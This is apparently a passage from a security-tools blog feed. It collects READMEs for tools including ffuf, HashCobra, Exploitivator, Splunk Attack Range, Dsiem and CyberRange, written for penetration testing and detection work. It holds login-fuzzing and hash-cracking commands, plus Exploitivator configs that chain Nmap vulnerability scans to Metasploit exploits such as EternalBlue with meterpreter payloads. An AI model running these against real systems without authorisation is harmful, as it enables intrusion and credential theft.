You don't have to install anything! For your convenience, prebuilt binaries for Linux, OSX and Windows are provided here that should run without any dependencies. Additionally, there is a web version at https://svenstaro.github.io/genact/
It's compatible with FreeBSD, Linux, OSX, Windows 10 (it needs a recent Windows 10 to get ANSI support) and most modern web browsers that support WebAssembly.
On FreeBSD: You don't have to do anything special here. Just run
pkg install genact
genact
On Linux: Download genact-linux from the releases page and run
chmod +x genact-linux
./genact-linux
On OSX: Download genact-osx from the releases page and run
chmod +x genact-osx
./genact-osx
On Windows: Download genact-win.exe from the releases page and double click it.
With Cargo: If you have a somewhat recent version of Rust and Cargo installed, you can run
cargo install genact
genact
With snap: If you'd like to use snapcraft, you can just get it from the snap store:
snap install genact
To build it yourself using snap, run:
snapcraft cleanbuild
snap install genact_*.snap --devmode --dangerous

Running
To see a list of all available options, you can run
./genact -h
or
cargo run -- -h
or (on Docker)
docker run -it --rm svenstaro/genact -h
The help:
genact 0.7.0
Sven-Hendrik Haase <svenstaro@gmail.com>
A nonsense activity generator

USAGE:
genact [FLAGS] [OPTIONS]

FLAGS:
-h, --help Prints help information
-l, --list-modules List available modules
-V, --version Prints version information

OPTIONS:
-e, --exitafter <EXITAFTER> Exit after running for this long (format example: 2h10min)
-m, --modules <MODULE>... Run only these modules [possible values: bootlog, botnet, cargo,
cc, composer, cryptomining, simcity, download, docker,
memdump, kernel_compile, weblog]
In the web version, you can run specific modules by providing them as ?module parameters like this: https://svenstaro.github.io/genact?module=cc&module=memdump

Compiling
You should have a recent version of rust and cargo installed. You don't need nightly. Then, just clone it like usual and cargo run to get output:
git clone https://github.com/svenstaro/genact.git
cd genact
cargo run


Fileintel - A Modular Python Application To Pull Intelligence About Malicious Files

$
0
0

This is a tool used to collect various intelligence sources for a given file. Fileintel is written in a modular fashion so new intelligence sources can be easily added.
Files are identified by file hash (MD5, SHA1, SHA256). The output is in CSV format and sent to STDOUT so the data can be saved or piped into another program. Since the output is in CSV format, spreadsheets such as Excel or database systems will easily be able to import the data.
This works with Python v2, but it should also work with Python v3. If you find it does not work with Python v3 please post an issue.
This code has been tested on Windows 7 and Mac OSX El Capitan. If you try this on any other type of machine please let me know!
An introduction video for fileintel: https://youtu.be/MgJoy2fD0ZY
Background from my first tool hostintel: https://github.com/keithjjones/hostintel

Help Screen:
$ python fileintel.py -h
usage: fileintel.py [-h] [-a] [-v] [-n] [-o] [-t] [-r]
ConfigurationFile InputFile

Modular application to look up file intelligence information. Outputs CSV to
STDOUT.

positional arguments:
ConfigurationFile Configuration file
InputFile Input file, one hash per line (MD5, SHA1, SHA256)

optional arguments:
-h, --help show this help message and exit
-a, --all Perform All Lookups.
-v, --virustotal VirusTotal Lookup.
-n, --nsrl NSRL Lookup for SHA-1 and MD5 hashes ONLY!
-o, --otx OTX by AlienVault Lookup.
-t, --threatcrowd ThreatCrowd Lookup for SHA-1 and MD5 hashes ONLY!
-r, --carriagereturn Use carriage returns with new lines on csv.

Install:
First, make sure your configuration file is correct for your computer/installation. Add your API keys and usernames as appropriate in the configuration file. Python and Pip are required to run this tool. There are modules that must be installed from GitHub, so be sure the git command is available from your command line. Git is easy to install for any platform. Next, install the python requirements (run this each time you git pull this repository too):
$ pip install -r requirements.txt
There have been some problems with the stock version of Python on Mac OSX (http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure). You may have to install the security portion of the requests library with the following command:
$ pip install requests[security]

NSRL
If you are using the NSRL database lookups, download the NSRL "Minimal" data set as a zip file. Put it in a directory you can access and point your configuration file to that zip file. There is no need to unzip the NSRL data.

7Zip
If you want to use 7Zip (fast) rather than the internal Python zip library (slow) to read the large NSRL zip file, you will need to install 7Zip. Windows installation of 7Zip is quite simple, but Mac OX X or Linux will need to install p7zip, the command line tool. For Mac OS X, you can install this tool with Brew. Once in install 7Zip you will need to point your configuration file appropriate to wherever the 7z executable lies.

Virtualenv
Lastly, I am a fan of virtualenv for Python. To make a customized local installation of Python to run this tool, I recommend you read:
http://docs.python-guide.org/en/latest/dev/virtualenvs/

Running:
$ python fileintel.py myconfigfile.conf myhashes.txt -a > myoutput.csv
You should be able to import myoutput.csv into any database or spreadsheet program.
Note that depending on your network, your API key limits, and the data you are searching for, this script can run for a very long time! Use each module sparingly! In return for the long wait, you save yourself from having to pull this data manually.

Sample Data:
There is some sample data in the "sampledata" directory. The hashes were picked at random and by no means is meant to target any organization or individual. Running this tool on the sample data works in the following way:

Smaller List:
$ python fileintel.py local/config.conf sampledata/smallerlist.txt -a > sampledata/smallerlist.csv
INFO: Using 7Zip from: /usr/local/bin/7z
Preprocessing NSRL database.... please hold...
*** Processing 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953a ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953b ***
*** Processing 92945627f32dfde376ffb7091b5faad2 ***
*** Processing 92945627f32dfde376ffb7091b5faad1 ***
*** Processing CEEF161D68AE2B690FA9616361271578 ***
*** Processing D41D8CD98F00B204E9800998ECF8427E ***
*** Processing B284A42B124849E71DBEF653D30229F1 ***
*** Processing 0322A0BA58B95DB9A2227F12D193FDDEA74CFF89 ***
*** Processing E02CE6D73156A11BA84A798B26DE1D12 ***
*** Processing B4ED7AEDACD28CBBDE6978FB09C22C75 ***
*** Processing C6336EA255EFA7371337C0882D175BEE44CBBD49 ***

Larger List:
$ python fileintel.py local/config.conf sampledata/largerlist.txt -a > sampledata/largerlist.csv
INFO: Using 7Zip from: /usr/local/bin/7z
Preprocessing NSRL database.... please hold...
*** Processing 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953a ***
*** Processing CEEF161D68AE2B690FA9616361271578 ***
*** Processing D41D8CD98F00B204E9800998ECF8427E ***
*** Processing B284A42B124849E71DBEF653D30229F1 ***
*** Processing 0322A0BA58B95DB9A2227F12D193FDDEA74CFF89 ***
*** Processing E02CE6D73156A11BA84A798B26DE1D12 ***
*** Processing B4ED7AEDACD28CBBDE6978FB09C22C75 ***
*** Processing C6336EA255EFA7371337C0882D175BEE44CBBD49 ***
...
*** Processing 09a64957060121a765185392fe2ec742 ***
*** Processing e0ab52a76073bff4a27bdf327230103d ***
*** Processing 02a5bd561c140236a3380785a3544b71 ***
*** Processing 152c3bb23cc 9cb0b0112051b94f69d47 ***
*** Processing 2c9a5e7ce87259ec89e182416ac3a4f8 ***
*** Processing c777b094a3469610d81c139c952e380e ***
*** Processing aa58d9126ed96fa61f53e4f6c0bcd6b4 ***
*** Processing a68e53c42e2d0968e2fbcd168323725f ***
*** Processing a1651db6630f90b11576389aa714ad41 ***

Intelligence Sources:

Resources:


Ffuf - Fast Web Fuzzer Written In Go

$
0
0
A fast web fuzzer written in Go.
Heavily inspired by the great projects gobuster and wfuzz.

Features
  • Fast!
  • Allows fuzzing of HTTP header values, POST data, and different parts of URL, including GET parameter names and values
  • Silent mode (-s) for clean output that's easy to use in pipes to other processes.
  • Modularized architecture that allows integration with existing toolchains with reasonable effort
  • Easy-to-add filters and matchers (they are interoperable)

Example cases

Typical directory discovery


By using the FUZZ keyword at the end of URL (-u):
ffuf -w /path/to/wordlist -u https://target/FUZZ

Virtual host discovery (without DNS records)


Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (-fs 4242)while fuzzing the Host - header:
ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242

GET parameter fuzzing
GET parameter name fuzzing is very similar to directory discovery, and works by defining the FUZZ keyword as a part of the URL. This also assumes an response size of 4242 bytes for invalid GET parameter name.
ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
If the parameter name is known, the values can be fuzzed the same way. This example assumes a wrong parameter value returning HTTP response code 401.
ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401

POST data fuzzing
This is a very straightforward operation, again by using the FUZZ keyword. This example is fuzzing only part of the POST request. We're again filtering out the 401 responses.
ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401

Using external mutator to produce test cases
For this example, we'll fuzz JSON data that's sent over POST. Radamsa is used as the mutator.
When --input-cmd is used, ffuf will display matches as their position. This same position value will be available for the callee as an environment variable $FFUF_NUM. We'll use this position value as the seed for the mutator. Files example1.txt and example2.txt contain valid JSON payloads. We are matching all the responses, but filtering out response code 400 - Bad request:
ffuf --input-cmd 'radamsa --seed $FFUF_NUM example1.txt example2.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/ -mc all -fc 400
It of course isn't very efficient to call the mutator for each payload, so we can also pre-generate the payloads, still using Radamsa as an example:
# Generate 1000 example payloads
radamsa -n 1000 -o %n.txt example1.txt example2.txt

# This results into files 1.txt ... 1000.txt
# Now we can just read the payload data in a loop from file for ffuf

ffuf --input-cmd 'cat $FFUF_NUM.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/ -mc all -fc 400

Usage
To define the test case for ffuf, use the keyword FUZZ anywhere in the URL (-u), headers (-H), or POST data (-d).
Usage of ./ffuf:
-D DirSearch style wordlist compatibility mode. Used in conjunction with -e flag. Replaces %EXT% in wordlist entry with each of the extensions provided by -e.
-H "Name: Value"
Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-V Show version information.
-X string
HTTP method to use (default "GET")
-ac
Automatically calibrate filtering options
-acc value
Custom auto-calibration string. Can be used multiple times. Implies -ac
-b "NAME1=VALUE1; NAME2=VALUE2"
Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
Results unpredictable when combined with -H "Cookie: ..."
-c Colorize output.
-compressed
Dummy flag for copy as curl functionality (ignored) (default true)
-cookie value
Cookie data (alias of -b)
-d string
POST data
-data string
POST data (alias of -d)
-data-ascii string
POST data (alias of -d)
-data-binary string
POST data (alias of -d)
-debug-log string
Write all of the internal logging to the specified file.
-e string
Comma separated list of extensions to apply. Each extension provided will extend the wordlist entry once.
-fc string
Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl string
Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr string
Filter regexp
-fs string
Filter HTTP response size. Comma separated list of sizes and ranges
-fw string
Filter by amount of words in response. Comma separated list of word counts and ranges
-i Dummy flag for copy as curl functionality (ignored) (default true)
-input-cmd value
Command producing the input. --input-num is required when using this input method. Overrides -w.
-input-num int
Number of inputs to test. Used in conjunction with --input-cmd. (default 100)
-k TLS identity verification
-mc string
Match HTTP status codes from respose, use "all" to match every response code. (default "200,204,301,302,307,401,403")
-ml string
Match amount of lines in response
-mode string
Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork (default "clusterbomb")
-mr string
Match regexp
-ms string
Match HTTP response size
-mw string
Match amount of words in response
-o string
Write output to file
-of string
Output file format. Available formats: json, ejson, html, md, csv, ecsv (default "json")
-p delay
Seconds of delay between requests, or a range of random delay. For example "0.1" or "0.1-2.0"
-r Follow redirects
-s Do not print additional information (silent mode )
-sa
Stop on all error cases. Implies -sf and -se
-se
Stop on spurious errors
-sf
Stop when > 95% of responses return 403 Forbidden
-t int
Number of concurrent threads. (default 40)
-timeout int
HTTP request timeout in seconds. (default 10)
-u string
Target URL
-v Verbose output, printing full URL and redirect location (if any) with the results.
-w value
Wordlist file path and (optional) custom fuzz keyword, using colon as delimiter. Use file path '-' to read from standard input. Can be supplied multiple times. Format: '/path/to/wordlist:KEYWORD'
-x string
HTTP Proxy URL
eg. ffuf -u https://example.org/FUZZ -w /path/to/wordlist

Installation
  • Download a prebuilt binary from releases page, unpack and run! or
  • If you have go compiler installed: go get github.com/ffuf/ffuf
The only dependency of ffuf is Go 1.11. No dependencies outside of Go standard library are needed.

Changelog
  • master
    • New
    • Changed
      • Limit the use of -e (extensions) to a single keyword: FUZZ
  • v0.12
    • New
      • Added a new flag to select a multi wordlist operation mode: --mode, possible values: clusterbomb and pitchfork.
      • Added a new output file format eJSON, for always base64 encoding the input data.
      • Redirect location is always shown in the output files (when using -o)
      • Full URL is always shown in the output files (when using -o)
      • HTML output format got DataTables support allowing realtime searches, sorting by column etc.
      • New CLI flag -v for verbose output. Including full URL, and redirect location.
      • SIGTERM monitoring, in order to catch keyboard interrupts an such, to be able to write -o files before exiting.
    • Changed
      • Fixed a bug in the default multi wordlist mode
      • Fixed JSON output regression, where all the input data was always encoded in base64
      • --debug-log no correctly logs connection errors
      • Removed -l flag in favor of -v
      • More verbose information in banner shown in startup.
  • v0.11
    • New
      • New CLI flag: -l, shows target location of redirect responses
      • New CLI flac: -acc, custom auto-calibration strings
      • New CLI flag: -debug-log, writes the debug logging to the specified file.
      • New CLI flags -ml and -fl, filters/matches line count in response
      • Ability to use multiple wordlists / keywords by defining multiple -w command line flags. The if no keyword is defined, the default is FUZZ to keep backwards compatibility. Example: -w "wordlists/custom.txt:CUSTOM" -H "RandomHeader: CUSTOM".
    • Changed
      • New CLI flag: -i, dummy flag that does nothing. for compatibility with copy as curl.
      • New CLI flag: -b/--cookie, cookie data for compatibility with copy as curl.
      • New Output format are available: HTML and Markdown table.
      • New CLI flag: -l, shows target location of redirect responses
      • Filtering and matching by status code, response size or word count now allow using ranges in addition to single values
      • The internal logging information to be discarded, and can be written to a file with the new -debug-log flag.
  • v0.10
    • New
      • New CLI flag: -ac to autocalibrate response size and word filters based on few preset URLs.
      • New CLI flag: -timeout to specify custom timeouts for all HTTP requests.
      • New CLI flag: --data for compatibility with copy as curl functionality of browsers.
      • New CLI flag: --compressed, dummy flag that does nothing. for compatibility with copy as curl.
      • New CLI flags: --input-cmd, and --input-num to handle input generation using external commands. Mutators for example. Environment variable FFUF_NUM will be updated on every call of the command.
      • When --input-cmd is used, display position instead of the payload in results. The output file (of all formats) will include the payload in addition to the position however.
    • Changed
      • Wordlist can also be read from standard input
      • Defining -d or --data implies POST method if -X doesn't set it to something else than GET
  • v0.9
    • New
      • New output file formats: CSV and eCSV (CSV with base64 encoded input field to avoid CSV breakage with payloads containing a comma)
      • New CLI flag to follow redirects
      • Erroring connections will be retried once
      • Error counter in status bar
      • New CLI flags: -se (stop on spurious errors) and -sa (stop on all errors, implies -se and -sf)
      • New CLI flags: -e to provide a list of extensions to add to wordlist entries, and -D to provide DirSearch wordlist format compatibility.
      • Wildcard option for response status code matcher.
  • v0.8
    • New
      • New CLI flag to write output to a file in JSON format
      • New CLI flag to stop on spurious 403 responses
    • Changed
      • Regex matching / filtering now matches the headers alongside of the response body


    Splunk Attack Range - A Tool That Allows You To Create Vulnerable Instrumented Local Or Cloud Environments To Simulate Attacks Against And Collect The Data Into Splunk

    $
    0
    0

    The Attack Range solves two main challenges in development of detections. First, it allows the user to quickly build a small lab infrastructure as close as possible to your production environment. This lab infrastructure contains a Windows Domain Controller, Windows Workstation and Linux server, which comes pre-configured with multiple security tools and logging configuration. The infrastructure comes with a Splunk server collecting multiple log sources from the different servers.
    Second, this framework allows the user to perform attack simulation using different engines. Therefore, the user can repeatedly replicate and generate data as close to "ground truth" as possible, in a format that allows the creation of detections, investigations, knowledge objects, and playbooks in Splunk.

    Architecture
    Attack Range can be used in two different ways:
    • local using vagrant and virtualbox
    • in the cloud using terraform and AWS
    In order to make Attack Range work on almost every laptop, the local version using Vagrant and Virtualbox consists of a subset of the full-blown cloud infrastructure in AWS using Terraform. The local version consists of a Splunk single instance and a Windows 10 workstation pre-configured with best practice logging configuration according to Splunk. The cloud infrastructure in AWS using Terraform consists of a Windows 10 workstation, a Windows 2016 server and a Splunk server. More information can be found in the wiki


    Configuration

    Running
    Attack Range supports different actions:
    • Build Attack Range
    • Perform Attack Simulation
    • Destroy Attack Range
    • Stop Attack Range
    • Resume Attack Range

    Build Attack Range
    • Build Attack Range using Terraform
    python attack_range.py -m terraform -a build
    • Build Attack Range using Vagrant
    python attack_range.py -m vagrant -a build

    Perform Attack Simulation
    python attack_range.py -m terraform -a simulate -st T1117,T1003 -t attack-range_windows_2016_dc
    • Perform Attack Simulation using Vagrant
    python attack_range.py -m vagrant -a simulate -st T1117,T1003 -t win10

    Destroy Attack Range
    • Destroy Attack Range using Terraform
    python attack_range.py -m terraform -a destroy
    • Destroy Attack Range using Vagrant
    python attack_range.py -m vagrant -a destroy

    Stop Attack Range
    • Stop Attack Range using Terraform
    python attack_range.py -m terraform -a stop
    • Stop Attack Range using Vagrant
    python attack_range.py -m vagrant -a stop

    Resume Attack Range
    • Resume Attack Range using Terraform
    python attack_range.py -m terraform -a resume
    • Resume Attack Range using Vagrant
    python attack_range.py -m vagrant -a resume

    Support
    Please use the GitHub issue tracker to submit bugs or request features.
    If you have questions or need support, you can:

    Author

    Contributors

    Acknowledgements


    HashCobra - Hash Cracking Tool

    $
    0
    0

    hashcobra Hash Cracking tool.

    Usage
    $ ./hashcobra -H
    --==[ hashcobra by sepehrdad ]==--

    usage:

    hashcobra -o <opr> [options] | [misc]

    options:

    -a <alg> - hashing algorithm [default: md5]
    - ? to list available algorithms
    -c <alg> - compression algorithm [default: zstd]
    - ? to list available algorithms
    -h <hash> - hash to crack
    -r <path> - rainbow table path [default: hashcobra.db]
    -d <path> - dictionary file path
    -o <opr> - operation to do
    - ? to list available operations
    misc:

    -V - show version
    -H - show help

    example:

    # Create md5 rainbow table with zstd compression from rockyou.txt
    $ hashcobra -o create -d rockyou.txt

    # Create sha512 rainbow table wit h no compression from darkc0de.lst
    $ hashcobra -o create -a sha512 -c none -r rt.db -d darkc0de.lst

    # Crack 1a1dc91c907325c69271ddf0c944bc72 using rt.db
    $ hashcobra -h 1a1dc91c907325c69271ddf0c944bc72 -r rt.db

    Description
    This tool uses Rainbow tables for cracking hashes
    this makes it to be really fast and a lot faster than traditional
    hash cracker.

    Build Prerequisites
    • Make is required.
    • GCC 8.0 or above is required.
    • Rocksdb most recent verison is required.
    • Openssl most recent verison is required.

    Building
    $ make

    LEGAL NOTICE
    THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.


    RTTM - Real Time Threat Monitoring Tool

    $
    0
    0

    Monitoring possible threats of your company on Internet is an impossible task to be achieved manually. Hence many threats of the company goes unnoticed until it becomes viral in public. Thus causing monetary/reputation damage. This is where RTTM comes into action. RTTM (Real Time Threat Monitoring Tool) is a tool developed to scrap all pasties,github,reddit..etc in real time to identify occurrence of search terms configured. Upon match an email will be triggered. Thus allowing company to react in case of leakage of code, any hacks tweeted..etc.. and harden themselves against an attack before it goes viral.
    Over the past 2 years the tool has evolved from simple search. Artificial intelligence has been implemented to perform better search based on context. If regex is needed even that is supported. Thus behaviour is close to human and reduces false positives.
    The best part of tool is that alert will be sent to email in less that 60 seconds from the time threat has made it to interent. Thus allowing response in real time to happen..
    The same tool in malicious user hands can be used offensively to get update on any latest hacks, code leakage etc...

    List of sites which will be monitored are:
    • Non-Pastie Sites
      • Twitter
      • Reddit
      • Github
    • Pastie Sites
      • Pastebin.com
      • Codepad.org
      • Dumpz.org
      • Snipplr.com
      • Paste.org.ru
      • Gist.github.com
      • Pastebin.ca
      • Kpaste.net
      • Slexy.org
      • Ideone.com
      • Pastebin.fr

    Architecture:


    How it works?
    Once the tool is started , engine gets kicked off and it runs forever. The main input for this engine is the configuration file. Based on the configuration file data, engine goes ahead and probes twitter/github/reddit for matches configured in configuration file. Upon a match is found, the link of twitter/github/reddit pushed to sqlite DB and an email alert is triggered.
    In case of pastie sites the logic is different. The reason being they do not support search nor streaming api's. Hence any new pastie made by any user, the link is fetched and pushed to kafka. From kafka any new link added is picked up and searched for matches configured in configuration file. Upon a match is found, the link of pastie site is pushed to sqlite DB and an email alert is triggered.
    Over the past 2 years the tool has evolved from simple search. Artificial intelligence has been implemented to perform better search based on context. If regex is needed even that is supported. Thus behaviour is close to human and reduces false positives.

    Detailed Tool Documentation:
    https://real-time-threat-monitoring.readthedocs.io/en/latest/

    Developers:
    Authors:
    • Naveen Rudrappa
    Contributors:
    • Sunny Sharma
    • Murali Segu


    Exploitivator - Automate Metasploit Scanning And Exploitation

    $
    0
    0

    This has only been tested on Kali.
    It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
    Install the necessary Kali packages and the PostgreSQL gem for Ruby: apt-get install postgresql libpq-dev git-core gem install pg
    Install current version of the msfrpc Python module from git: git clone git://github.com/SpiderLabs/msfrpc.git msfrpc cd msfrpc/python-msfrpc python setup.py install

    Usage
    Before running either of the scripts, load msfconsole and start the MSGRPC service.
    MSGRPC can be started with msfrpcd in Metasploit as follows: load msgrpc Pass=abc123
    The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).
    Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.

    Exploitivator
    Command line usage:
    Examples: The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

    MSFScan
    Command line usage: ./msf_scan.py filename ./msf_scan.py filename MSF_DB_Username MSF_DB_Password
    Examples: The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123
    To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username(msf) and the script's default Metasploit Postgres password(abc123): ./msf_scan.py hosts.txt

    Config Files
    Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.

    MSFScan
    The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans the are to run against the targets. e.g.: auxiliary/scanner/dcerpc/endpoint_mapper auxiliary/scanner/smb/smb_version auxiliary/scanner/x11/open_x11 auxiliary/scanner/discovery/ipv6_multicast_ping auxiliary/scanner/discovery/ipv6_neighbor auxiliary/scanner/smb/smb_login

    Exploitivator
    This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). These use '##' as a separator and have the following formats.
    exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]
    In the above format:
    1. The first section is a label linking the scan to the exploit
    2. The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
    3. The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
    4. The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file
    An example file content is shown below: SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd" JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"
    exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]
    An example file content is shown below: SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

    References
    Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc
    Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/



    Dsiem - Security Event Correlation Engine For ELK Stack

    $
    0
    0

    Dsiem is a security event correlation engine for ELK stack, allowing the platform to be used as a dedicated and full-featured SIEM system.
    Dsiem provides OSSIM-style correlation for normalized logs/events, perform lookup/query to threat intelligence and vulnerability information sources, and produces risk-adjusted alarms.

    Features
    • Runs in standalone or clustered mode with NATS as messaging bus between frontend and backend nodes. Along with ELK, this made the entire SIEM platform horizontally scalable.
    • OSSIM-style correlation and directive rules, bridging easier transition from OSSIM.
    • Alarms enrichment with data from threat intel and vulnerability information sources. Builtin support for Moloch Wise (which supports Alienvault OTX and others) and Nessus CSV exports. Support for other sources can easily be implemented as plugins.
    • Instrumentation supported through Metricbeat and/or Elastic APM server. No need extra stack for this purpose.
    • Builtin rate and back-pressure control, set the minimum and maximum events/second (EPS) received from Logstash depending on your hardware capacity and acceptable delays in event processing.
    • Loosely coupled, designed to be composable with other infrastructure platform, and doesn't try to do everything. Loose coupling also means that it's possible to use Dsiem as an OSSIM-style correlation engine with non ELK stack if needed.
    • Batteries included:
      • A directive conversion tool that reads OSSIM XML directive file and translate it to Dsiem JSON-style config.
      • A SIEM plugin creator tool that will read off an existing index pattern from Elasticsearch, and creates the necessary Logstash configuration to clone the relevant fields' content to Dsiem. The tool can also generate basic directive required by Dsiem to correlate received events and generate alarm.
      • A helper tool to serve Nessus CSV files over the network to Dsiem.
      • A light weight Angular web UI just for basic alarms management (closing, tagging), and easy pivoting to the relevant indices in Kibana to perform the actual analysis.
    • Obviously a cloud-native, twelve-factor app, and all that jazz.

    How It Works


    On the diagram above:
    1. Log sources send their logs to Syslog/Filebeat, which then sends them to Logstash with a unique identifying field. Logstash then parses the logs using different filters based on the log sources type, and sends the results to Elasticsearch, typically creating a single index pattern for each log type (e.g. suricata-* for logs received from Suricata IDS, ssh-* for SSH logs, etc.).
    2. Dsiem uses a special purpose logstash config file to clone incoming event from log sources, right after logstash has done parsing it. Through the same config file, the new cloned event is used (independently from the original event) to collect Dsiem required fields like Title, Source IP, Destination IP, and so on.
    3. The output of the above step is called Normalized Event because it represent logs from multiple different sources in a single format that has a set of common fields. Those events are then sent to Dsiem through Logstash HTTP output plugin, and to Elasticsearch under index name pattern siem_events-*.
    4. Dsiem correlates incoming normalized events based on the configured directive rules, perform threat intel and vulnerability lookups, and then generates an alarm if the rules conditions are met. The alarm is then written to a local log file, that is harvested by a local Filebeat configured to send its content to Logstash.
    5. At the logstash end, there's another Dsiem special config file that reads those submitted alarms and push them to the final SIEM alarm index in Elasticsearch.
    The final result of the above processes is that now we can watch for new alarms and updates to an existing one just by monitoring a single Elasticsearch index.

    Installation
    You can use Docker Compose or the release binaries to install Dsiem. Refer to the Installation Guide for details.
    Alternatively, there's also a Docker Compose or virtual machine-based demo environment that you can use to evaluate all Dsiem integration from one simple web interface.

    Documentation
    Currently available docs are located here.


    CyberRange - The Open-Source AWS Cyber Range

    $
    0
    0

    This CyberRange project represents the first open-source Cyber Range blueprint in the world.
    This project provides a bootstrap framework for a complete offensive, defensive, reverse engineering, & security intelligence tooling in a private research lab using the AWS Cloud.
    This project contains vulnerable systems and a toolkit of the most powerful open-source / community edition tools known to Penetration testers.
    It simply provides a researcher with a disposable offensive / defensive AWS-based environment in less than 5 minutes.



    Get Started
    To gain access you must send me your AWS account number so I can share the 30+ Amazon Machine Images (AMIs).
    Use my secure FormAssembly form -> CyberRange Sign-Up Form
    Then - Read the Getting Started Guide

    Range History

    Release Notes:
    view the changelog
    v2 - released on Sept 6, 2019 v2 is simply a collection of the best-in-class tools, most emerging toolsets, and bootstrap frameworks to create an integrated solution capable of enormous growth.
     features include: makefile, inspec tests, detection lab integration, commandoVM v2, 
    kali 2019.4 w/ the following opensource github tools: CyberRange, DetectionLab, IntruderPayloads,
    aws-credential-compromise-detection, aws-nuke, blast-radius, cloudgoat, cloudmapper, packer-windows,
    pacu, security-monkey-terraform, security_monkey, sites-using-cloudflare,
    net-creds, Reconnoitre, shell_generator.sh, msploitego, awesome-nodejs-pentest,
    cloudgoat, hammer, joomscan, learning-tools, LetsMapYourNetwork,
    php-webshells, PowerHub, PowerSploit, snmpwn, vulhub, ScoutSuite, prowler,
    pacbot, terraform-aws-secure-baseline, gitleaks, my-arsenal-of-aws-security-tools

    Range Technology
    CyberRange combines best practices with emerging technologies.
    • Amazon Web Services
    • Kali
    • Nessus
    • Commando-VM - a windows-based penetration testing VM
    • Terraform
    • OpenSourced Vulnerable VM's See Asset Inventory
    • using a CI/CD tool to verify builds CircleCI
    • Docker / docker-compose
    • Metasplotiable 2/3 & other open-source vuln vms on VulnHub
    • DetectionLab
    • Inspec - to test the state of your environment, application, system, processes, configurations, etc.
    • Plus Many more things to setup, configure, and experiment with.

    Domains of knowledge
    This open-source research lab provides a bootstrap learning platform for Technologists studying any one of the "Big-3" technology skills.
    1. Cyber Security
    2. Cloud Computing
    3. DevOps
    This project supports 7 gigantically broad domains of technical knowledge.
    1. Offensive Security
